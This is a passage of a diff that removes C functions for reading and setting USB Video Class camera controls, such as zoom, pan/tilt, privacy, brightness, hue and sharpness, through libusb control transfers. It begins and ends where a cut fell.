- * @brief Reads the ZOOM_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] zoom_rel TODO
- * @param[out] digital_zoom TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_zoom_rel(uvc_device_handle_t *devh, int8_t* zoom_rel, uint8_t* digital_zoom, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[3];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ZOOM_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *zoom_rel = data[0];
-    *digital_zoom = data[1];
-    *speed = data[2];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ZOOM_RELATIVE control.
- * @param devh UVC device handle
- * @param zoom_rel TODO
- * @param digital_zoom TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_zoom_rel(uvc_device_handle_t *devh, int8_t zoom_rel, uint8_t digital_zoom, uint8_t speed) {
-  uint8_t data[3];
-  uvc_error_t ret;
-
-  data[0] = zoom_rel;
-  data[1] = digital_zoom;
-  data[2] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ZOOM_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PANTILT_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] pan TODO
- * @param[out] tilt TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_pantilt_abs(uvc_device_handle_t *devh, int32_t* pan, int32_t* tilt, enum uvc_req_code req_code) {
-  uint8_t data[8];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PANTILT_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *pan = DW_TO_INT(data + 0);
-    *tilt = DW_TO_INT(data + 4);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PANTILT_ABSOLUTE control.
- * @param devh UVC device handle
- * @param pan TODO
- * @param tilt TODO
- */
-uvc_error_t uvc_set_pantilt_abs(uvc_device_handle_t *devh, int32_t pan, int32_t tilt) {
-  uint8_t data[8];
-  uvc_error_t ret;
-
-  INT_TO_DW(pan, data + 0);
-  INT_TO_DW(tilt, data + 4);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PANTILT_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PANTILT_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] pan_rel TODO
- * @param[out] pan_speed TODO
- * @param[out] tilt_rel TODO
- * @param[out] tilt_speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_pantilt_rel(uvc_device_handle_t *devh, int8_t* pan_rel, uint8_t* pan_speed, int8_t* tilt_rel, uint8_t* tilt_speed, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PANTILT_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *pan_rel = data[0];
-    *pan_speed = data[1];
-    *tilt_rel = data[2];
-    *tilt_speed = data[3];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PANTILT_RELATIVE control.
- * @param devh UVC device handle
- * @param pan_rel TODO
- * @param pan_speed TODO
- * @param tilt_rel TODO
- * @param tilt_speed TODO
- */
-uvc_error_t uvc_set_pantilt_rel(uvc_device_handle_t *devh, int8_t pan_rel, uint8_t pan_speed, int8_t tilt_rel, uint8_t tilt_speed) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  data[0] = pan_rel;
-  data[1] = pan_speed;
-  data[2] = tilt_rel;
-  data[3] = tilt_speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PANTILT_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ROLL_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] roll TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_roll_abs(uvc_device_handle_t *devh, int16_t* roll, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ROLL_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roll = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ROLL_ABSOLUTE control.
- * @param devh UVC device handle
- * @param roll TODO
- */
-uvc_error_t uvc_set_roll_abs(uvc_device_handle_t *devh, int16_t roll) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(roll, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ROLL_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ROLL_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] roll_rel TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_roll_rel(uvc_device_handle_t *devh, int8_t* roll_rel, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ROLL_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roll_rel = data[0];
-    *speed = data[1];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ROLL_RELATIVE control.
- * @param devh UVC device handle
- * @param roll_rel TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_roll_rel(uvc_device_handle_t *devh, int8_t roll_rel, uint8_t speed) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  data[0] = roll_rel;
-  data[1] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ROLL_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PRIVACY control.
- * @param devh UVC device handle
- * @param[out] privacy TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_privacy(uvc_device_handle_t *devh, uint8_t* privacy, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PRIVACY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *privacy = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PRIVACY control.
- * @param devh UVC device handle
- * @param privacy TODO
- */
-uvc_error_t uvc_set_privacy(uvc_device_handle_t *devh, uint8_t privacy) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = privacy;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PRIVACY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_WINDOW control.
- * @param devh UVC device handle
- * @param[out] window_top TODO
- * @param[out] window_left TODO
- * @param[out] window_bottom TODO
- * @param[out] window_right TODO
- * @param[out] num_steps TODO
- * @param[out] num_steps_units TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_window(uvc_device_handle_t *devh, uint16_t* window_top, uint16_t* window_left, uint16_t* window_bottom, uint16_t* window_right, uint16_t* num_steps, uint16_t* num_steps_units, enum uvc_req_code req_code) {
-  uint8_t data[12];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_DIGITAL_WINDOW_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *window_top = SW_TO_SHORT(data + 0);
-    *window_left = SW_TO_SHORT(data + 2);
-    *window_bottom = SW_TO_SHORT(data + 4);
-    *window_right = SW_TO_SHORT(data + 6);
-    *num_steps = SW_TO_SHORT(data + 8);
-    *num_steps_units = SW_TO_SHORT(data + 10);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_WINDOW control.
- * @param devh UVC device handle
- * @param window_top TODO
- * @param window_left TODO
- * @param window_bottom TODO
- * @param window_right TODO
- * @param num_steps TODO
- * @param num_steps_units TODO
- */
-uvc_error_t uvc_set_digital_window(uvc_device_handle_t *devh, uint16_t window_top, uint16_t window_left, uint16_t window_bottom, uint16_t window_right, uint16_t num_steps, uint16_t num_steps_units) {
-  uint8_t data[12];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(window_top, data + 0);
-  SHORT_TO_SW(window_left, data + 2);
-  SHORT_TO_SW(window_bottom, data + 4);
-  SHORT_TO_SW(window_right, data + 6);
-  SHORT_TO_SW(num_steps, data + 8);
-  SHORT_TO_SW(num_steps_units, data + 10);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_DIGITAL_WINDOW_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the REGION_OF_INTEREST control.
- * @param devh UVC device handle
- * @param[out] roi_top TODO
- * @param[out] roi_left TODO
- * @param[out] roi_bottom TODO
- * @param[out] roi_right TODO
- * @param[out] auto_controls TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_roi(uvc_device_handle_t *devh, uint16_t* roi_top, uint16_t* roi_left, uint16_t* roi_bottom, uint16_t* roi_right, uint16_t* auto_controls, enum uvc_req_code req_code) {
-  uint8_t data[10];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_REGION_OF_INTEREST_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roi_top = SW_TO_SHORT(data + 0);
-    *roi_left = SW_TO_SHORT(data + 2);
-    *roi_bottom = SW_TO_SHORT(data + 4);
-    *roi_right = SW_TO_SHORT(data + 6);
-    *auto_controls = SW_TO_SHORT(data + 8);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the REGION_OF_INTEREST control.
- * @param devh UVC device handle
- * @param roi_top TODO
- * @param roi_left TODO
- * @param roi_bottom TODO
- * @param roi_right TODO
- * @param auto_controls TODO
- */
-uvc_error_t uvc_set_digital_roi(uvc_device_handle_t *devh, uint16_t roi_top, uint16_t roi_left, uint16_t roi_bottom, uint16_t roi_right, uint16_t auto_controls) {
-  uint8_t data[10];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(roi_top, data + 0);
-  SHORT_TO_SW(roi_left, data + 2);
-  SHORT_TO_SW(roi_bottom, data + 4);
-  SHORT_TO_SW(roi_right, data + 6);
-  SHORT_TO_SW(auto_controls, data + 8);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_REGION_OF_INTEREST_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the BACKLIGHT_COMPENSATION control.
- * @param devh UVC device handle
- * @param[out] backlight_compensation device-dependent backlight compensation mode; zero means backlight compensation is disabled
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_backlight_compensation(uvc_device_handle_t *devh, uint16_t* backlight_compensation, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_BACKLIGHT_COMPENSATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *backlight_compensation = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the BACKLIGHT_COMPENSATION control.
- * @param devh UVC device handle
- * @param backlight_compensation device-dependent backlight compensation mode; zero means backlight compensation is disabled
- */
-uvc_error_t uvc_set_backlight_compensation(uvc_device_handle_t *devh, uint16_t backlight_compensation) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(backlight_compensation, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_BACKLIGHT_COMPENSATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the BRIGHTNESS control.
- * @param devh UVC device handle
- * @param[out] brightness TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_brightness(uvc_device_handle_t *devh, int16_t* brightness, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_BRIGHTNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *brightness = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the BRIGHTNESS control.
- * @param devh UVC device handle
- * @param brightness TODO
- */
-uvc_error_t uvc_set_brightness(uvc_device_handle_t *devh, int16_t brightness) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(brightness, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_BRIGHTNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the CONTRAST control.
- * @param devh UVC device handle
- * @param[out] contrast TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_contrast(uvc_device_handle_t *devh, uint16_t* contrast, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_CONTRAST_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *contrast = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the CONTRAST control.
- * @param devh UVC device handle
- * @param contrast TODO
- */
-uvc_error_t uvc_set_contrast(uvc_device_handle_t *devh, uint16_t contrast) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(contrast, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_CONTRAST_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the CONTRAST_AUTO control.
- * @param devh UVC device handle
- * @param[out] contrast_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_contrast_auto(uvc_device_handle_t *devh, uint8_t* contrast_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_CONTRAST_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *contrast_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the CONTRAST_AUTO control.
- * @param devh UVC device handle
- * @param contrast_auto TODO
- */
-uvc_error_t uvc_set_contrast_auto(uvc_device_handle_t *devh, uint8_t contrast_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = contrast_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_CONTRAST_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the GAIN control.
- * @param devh UVC device handle
- * @param[out] gain TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_gain(uvc_device_handle_t *devh, uint16_t* gain, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_GAIN_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *gain = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the GAIN control.
- * @param devh UVC device handle
- * @param gain TODO
- */
-uvc_error_t uvc_set_gain(uvc_device_handle_t *devh, uint16_t gain) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(gain, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_GAIN_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the POWER_LINE_FREQUENCY control.
- * @param devh UVC device handle
- * @param[out] power_line_frequency TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_power_line_frequency(uvc_device_handle_t *devh, uint8_t* power_line_frequency, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_POWER_LINE_FREQUENCY_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *power_line_frequency = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the POWER_LINE_FREQUENCY control.
- * @param devh UVC device handle
- * @param power_line_frequency TODO
- */
-uvc_error_t uvc_set_power_line_frequency(uvc_device_handle_t *devh, uint8_t power_line_frequency) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = power_line_frequency;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_POWER_LINE_FREQUENCY_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the HUE control.
- * @param devh UVC device handle
- * @param[out] hue TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_hue(uvc_device_handle_t *devh, int16_t* hue, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_HUE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *hue = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the HUE control.
- * @param devh UVC device handle
- * @param hue TODO
- */
-uvc_error_t uvc_set_hue(uvc_device_handle_t *devh, int16_t hue) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(hue, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_HUE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the HUE_AUTO control.
- * @param devh UVC device handle
- * @param[out] hue_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_hue_auto(uvc_device_handle_t *devh, uint8_t* hue_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_HUE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *hue_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the HUE_AUTO control.
- * @param devh UVC device handle
- * @param hue_auto TODO
- */
-uvc_error_t uvc_set_hue_auto(uvc_device_handle_t *devh, uint8_t hue_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = hue_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_HUE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the SATURATION control.
- * @param devh UVC device handle
- * @param[out] saturation TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_saturation(uvc_device_handle_t *devh, uint16_t* saturation, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_SATURATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *saturation = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SATURATION control.
- * @param devh UVC device handle
- * @param saturation TODO
- */
-uvc_error_t uvc_set_saturation(uvc_device_handle_t *devh, uint16_t saturation) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(saturation, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_SATURATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the SHARPNESS control.
- * @param devh UVC device handle
- * @param[out] sharpness TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_sharpness(uvc_device_handle_t *devh, uint16_t* sharpness, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_SHARPNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *sharpness = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SHARPNESS control.
- * @param devh UVC device handle
- * @param sharpness TODO
- */
-uvc_error_t uvc_set_sharpness(uvc_device_handle_t *devh, uint16_t sharpness) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(sharpness, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
